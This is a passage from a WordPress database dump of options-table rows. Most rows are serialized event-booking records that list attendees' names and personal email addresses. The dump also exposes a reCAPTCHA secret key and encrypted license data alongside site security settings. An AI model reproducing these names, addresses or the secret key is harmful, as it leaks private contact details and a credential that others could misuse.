Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1663700400:1663704000\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267243;s:11:\"invoice_key\";s:32:\"8d454947e9992ae8062d04330086aa24\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6667320,'autoptimize_html_minify_inline','on','yes'),(6667321,'autoptimize_installed_before_compatibility','','yes'),(6668300,'scripts-to-footer','a:0:{}','yes'),(6668558,'advanced_google_recaptcha_wpan_time','1686320054','no'),(6668564,'agr_options','a:11:{s:12:\"captcha_type\";s:2:\"v3\";s:8:\"site_key\";s:40:\"6LeDktUhAAAAAHiDs41sZkBo-lVEOB8_Y-P7X-iH\";s:10:\"secret_key\";s:40:\"6LeDktUhAAAAAAXS3zubRB3rEXtl3ZePn0TW5jGP\";s:12:\"enable_login\";i:1;s:15:\"enable_register\";i:0;s:20:\"enable_lost_password\";i:0;s:19:\"enable_comment_form\";i:0;s:19:\"enable_woo_register\";i:0;s:19:\"enable_woo_checkout\";i:0;s:19:\"enable_edd_register\";i:0;s:18:\"enable_bp_register\";i:0;}','yes'),(6677423,'MOF87584','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267260;s:11:\"invoice_key\";s:32:\"e38d290b4d2278ac9926bf79020eebc4\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6705422,'wp-optimize-webp_conversion_test','1','yes'),(6711615,'MUA58591','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665311400:1665358200\";s:8:\"event_id\";s:6:\"267237\";s:19:\"translated_event_id\";s:6:\"267237\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267300;s:11:\"invoice_key\";s:32:\"445602e3caebe5af1d5b73163486dc51\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6711753,'NYM84882','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"MVEpianist@gmail.com\";s:4:\"name\";s:17:\"Marcia Van Egmond\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665311400:1665358200\";s:8:\"event_id\";s:6:\"267237\";s:19:\"translated_event_id\";s:6:\"267237\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267301;s:11:\"invoice_key\";s:32:\"72c1a5b076bdc7421da52c902231577b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"MVEpianist@gmail.com\";s:4:\"name\";s:17:\"Marcia Van Egmond\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6711973,'TXR11723','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665311400:1665358200\";s:8:\"event_id\";s:6:\"267237\";s:19:\"translated_event_id\";s:6:\"267237\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267302;s:11:\"invoice_key\";s:32:\"5538ac89cfad83c14cd9584b69e89e61\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6712003,'BGC33180','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665311400:1665358200\";s:8:\"event_id\";s:6:\"267237\";s:19:\"translated_event_id\";s:6:\"267237\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267303;s:11:\"invoice_key\";s:32:\"ef77906fbec13037e5cccae8c19770a3\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6725455,'RCO64499','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267320;s:11:\"invoice_key\";s:32:\"7cb076fb6dcef7cdbc4f576330140413\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6725473,'CBT92815','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267321;s:11:\"invoice_key\";s:32:\"fd71fb73ad81312783267d919616a1ed\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6730977,'GZD40069','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267329;s:11:\"invoice_key\";s:32:\"e0b0fc297438ca1a5b1e57d0988bc084\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6732947,'ENJ93195','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267330;s:11:\"invoice_key\";s:32:\"8fe930e0984e9b5db8bee103db66aa93\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6733184,'TOD81749','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:12:\"Kery Colvin \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1665920700:1665925200\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267331;s:11:\"invoice_key\";s:32:\"98b41ed799cdaddfd24385b02b7bb4d1\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:12:\"Kery Colvin \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6750002,'_site_transient_bg_license_data','O:8:\"stdClass\":5:{s:3:\"key\";s:64:\"lhc4JZhCPjeinJ7vkUzJVHPavfie4bLXE3G6DQq8QmNiSZLnHJo+w6XlbPrBMhRZ\";s:6:\"cipher\";s:11:\"AES-128-CBC\";s:2:\"iv\";s:40:\"C%B5N%28%EA%23%D2E%A6%C4%8E%00%8E%B0%B6.\";s:4:\"data\";s:556:\"gEWl3H2fYIAlULg4XlXLn6yTkbIN5nYHnFapYVW/TtcHuUg8sa4llROKEsWkePEsxOcM7VJct7sV+N4eDxwXLYe44RVkwBHX3Hwttt7T4PbnwXIc5q5VP05X5f+zAn/J8HMmNjnwiz4q44bqIsBvlUIRgQccwkI6a0X9reF14q3JQnhW+6sm+55fYvLRnxdHaWK/PsQ+qRpHGngHwg/gOXs9w+phC97TlTnGMBE1vnWw532O5uLBBjLgDv7+5T6PsohCJGpZGUyhNVSEGMkpFdMHI8a3OAVGyH4o54Pva4GiQkZd3VikKb9b45Y8U/MiQHdO2JBdy/PYnLN4Q3wAsmGMVoac74kqHpmaK+jGsR9bf8FZVp10aL0aFIHppz/G3DMoWD9vNEwGpx70qKeo4UHh6HJtCkuDMNt8fgziX2SL17zWR5lF3bn7SVsJkLhP/wjVfB7orRGSt5EDnaJnWmmCIXvdzIA7tntpj/JOwzBjFQ3djCkDFzcClr03Mmnc8AsqmocQivfSYWDaW3HtG8Ey7V+SLp4cH6mJJ7573OQ=\";s:7:\"version\";i:2;}','no'),(6764753,'KLW43515','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1667730600:1667777400\";s:8:\"event_id\";s:6:\"267334\";s:19:\"translated_event_id\";s:6:\"267334\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267395;s:11:\"invoice_key\";s:32:\"bf0f21d6645dd8bba47bfe0f8f0467e5\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6765685,'sgpb-all-dismissed-notifications','{\"pb-halloween2023\":\"pb-halloween2023\"}','yes'),(6770612,'QTD92990','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"rumipaz@gmail.com\";s:4:\"name\";s:12:\"Alberto Ruiz\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1667730600:1667777400\";s:8:\"event_id\";s:6:\"267334\";s:19:\"translated_event_id\";s:6:\"267334\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267406;s:11:\"invoice_key\";s:32:\"4d4bd22ccb36a6bfa75dc65a66e0b069\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"rumipaz@gmail.com\";s:4:\"name\";s:12:\"Alberto Ruiz\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6788091,'BRH36761','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:6:\"Gordon\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1667730600:1667777400\";s:8:\"event_id\";s:6:\"267334\";s:19:\"translated_event_id\";s:6:\"267334\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267415;s:11:\"invoice_key\";s:32:\"0e3eded5c31f578239a6a62e13fe14fc\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:6:\"Gordon\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6789757,'BJA68504','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"Raelinharp@yahoo.com\";s:4:\"name\";s:6:\"Raelin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1667730600:1667777400\";s:8:\"event_id\";s:6:\"267334\";s:19:\"translated_event_id\";s:6:\"267334\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267417;s:11:\"invoice_key\";s:32:\"8ecefde06373f1debc4a6dfaa7ae3c43\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"Raelinharp@yahoo.com\";s:4:\"name\";s:6:\"Raelin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6789984,'XVA53791','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:32:\"Sandy(Tarzana/Encino California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668335400:1668382200\";s:8:\"event_id\";s:6:\"267408\";s:19:\"translated_event_id\";s:6:\"267408\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267419;s:11:\"invoice_key\";s:32:\"754df8c55d9add5a10471c02d3f69ada\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:32:\"Sandy(Tarzana/Encino California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6807446,'rsssl_options','a:22:{s:12:\"site_has_ssl\";s:1:\"1\";s:11:\"ssl_enabled\";b:1;s:19:\"mixed_content_fixer\";b:1;s:8:\"redirect\";s:11:\"wp_redirect\";s:20:\"do_not_edit_htaccess\";b:0;s:19:\"dismiss_all_notices\";b:0;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"review_notice_shown\";s:1:\"1\";s:24:\"send_notifications_email\";i:1;s:22:\"hide_wordpress_version\";i:1;s:24:\"disable_user_enumeration\";i:1;s:36:\"vulnerability_notification_dashboard\";s:1:\"l\";s:35:\"vulnerability_notification_sitewide\";s:1:\"h\";s:38:\"vulnerability_notification_email_admin\";s:1:\"c\";s:16:\"x_xss_protection\";s:4:\"zero\";s:15:\"x_frame_options\";s:0:\"\";s:15:\"referrer_policy\";s:31:\"strict-origin-when-cross-origin\";s:12:\"hsts_max_age\";s:8:\"63072000\";s:26:\"cross_origin_opener_policy\";s:8:\"disabled\";s:28:\"cross_origin_resource_policy\";s:8:\"disabled\";s:28:\"cross_origin_embedder_policy\";s:8:\"disabled\";s:19:\"csp_frame_ancestors\";s:8:\"disabled\";}','yes'),(6807447,'rsssl_show_onboarding','1','no'),(6807606,'rsssl_6_notice_dismissed','1','no'),(6807622,'_transient_rsssl_http_methods_allowed','a:1:{s:7:\"allowed\";a:18:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";i:2;s:3:\"PUT\";i:3;s:6:\"DELETE\";i:4;s:4:\"HEAD\";i:5;s:7:\"OPTIONS\";i:6;s:7:\"CONNECT\";i:7;s:5:\"TRACE\";i:8;s:5:\"TRACK\";i:9;s:5:\"PATCH\";i:10;s:4:\"COPY\";i:11;s:4:\"LINK\";i:12;s:6:\"UNLINK\";i:13;s:5:\"PURGE\";i:14;s:4:\"LOCK\";i:15;s:6:\"UNLOCK\";i:16;s:8:\"PROPFIND\";i:17;s:4:\"VIEW\";}}','yes'),(6807636,'rsssl_onboarding_dismissed','1','no'),(6810743,'YVC14670','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"inyear25252002@yahoo.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668335400:1668382200\";s:8:\"event_id\";s:6:\"267408\";s:19:\"translated_event_id\";s:6:\"267408\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267440;s:11:\"invoice_key\";s:32:\"04fe6a694d88838ac1a1d61aaa451131\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"inyear25252002@yahoo.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6817025,'FDN78743','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"freedroger9@gmail.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668335400:1668382200\";s:8:\"event_id\";s:6:\"267408\";s:19:\"translated_event_id\";s:6:\"267408\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267451;s:11:\"invoice_key\";s:32:\"d32b58bea9e57406c2a3f542d63dc391\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"freedroger9@gmail.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6840530,'TJO25322','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:45:\"Sandy(Tarzana San Fernando Valley California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668948300:1668952800\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267516;s:11:\"invoice_key\";s:32:\"0e65deeffa84b44d5f88327ef5887aad\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:45:\"Sandy(Tarzana San 